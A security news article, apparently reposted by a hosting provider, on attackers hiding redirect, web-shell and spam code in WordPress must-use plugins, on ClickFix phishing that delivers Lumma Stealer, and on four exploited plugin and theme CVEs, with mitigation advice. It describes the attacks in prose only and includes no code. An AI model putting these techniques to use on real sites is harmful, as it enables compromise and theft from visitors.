Threat actors are exploiting the "mu-plugins" directory in WordPress sites to embed malicious code, allowing them persistent remote access and the ability to redirect visitors to fraudulent websites. These mu-plugins, or must-use plugins, exist in a specific directory that WordPress automatically executes without user permission, which makes them a prime target for malware.

According to Sucuri’s research, three forms of harmful PHP code have been identified in these directories:

• redirect.php: This file redirects users to an external malicious website.
• index.php: Provides attackers with web shell-like capabilities, allowing them to execute arbitrary code by fetching a remote PHP script.
• custom-js-loader.php: Injects spam into the affected websites, possibly aiming to promote scams or manipulate SEO by replacing images with explicit content and hijacking outbound links.

The redirect.php script cleverly masquerades as a browser update to trick victims into installing malware designed to steal personal information or deploy additional malicious payloads. It includes functionality to detect bots, shielding itself from search engine crawlers that could reveal the redirection pattern.

In light of these breaches, threat actors are also using compromised WordPress sites as launchpads for phishing attacks, prompting victims to run harmful PowerShell commands under the pretext of Google reCAPTCHA or Cloudflare CAPTCHA verification—a method known as ClickFix. This tactic facilitates the delivery of the Lumma Stealer malware.

While it remains unclear how these sites were compromised, common vulnerabilities include outdated plugins or themes, weak admin credentials, and misconfigurations of servers.

Recent findings by Patchstack reveal four critical WordPress vulnerabilities that have been actively targeted since the beginning of 2025, including:

1. CVE-2024-27956 (CVSS score: 9.9): Unauthenticated arbitrary SQL execution vulnerability in the WordPress Automatic Plugin.
2. CVE-2024-25600 (CVSS score: 10.0): Unauthenticated remote code execution vulnerability in the Bricks theme.
3. CVE-2024-8353 (CVSS score: 10.0): Unauthenticated PHP object injection leading to remote code execution in the GiveWP plugin.
4. CVE-2024-4345 (CVSS score: 10.0): An unauthenticated arbitrary file upload vulnerability in the Startklar Elementor Addons for WordPress.

To mitigate risks posed by these threats, WordPress site operators are urged to keep plugins and themes updated, conduct regular code audits for malicious content, enforce robust passwords, and implement a web application firewall to thwart malicious requests and prevent code injections.

Welcome to DediRock, your trusted partner in high-performance hosting solutions. At DediRock, we specialize in providing dedicated servers, VPS hosting, and cloud services tailored to meet the unique needs of businesses and individuals alike. Our mission is to deliver reliable, scalable, and secure hosting solutions that empower our clients to achieve their digital goals. With a commitment to exceptional customer support, cutting-edge technology, and robust infrastructure, DediRock stands out as a leader in the hosting industry. Join us and experience the difference that dedicated service and unwavering reliability can make for your online presence. Launch our website.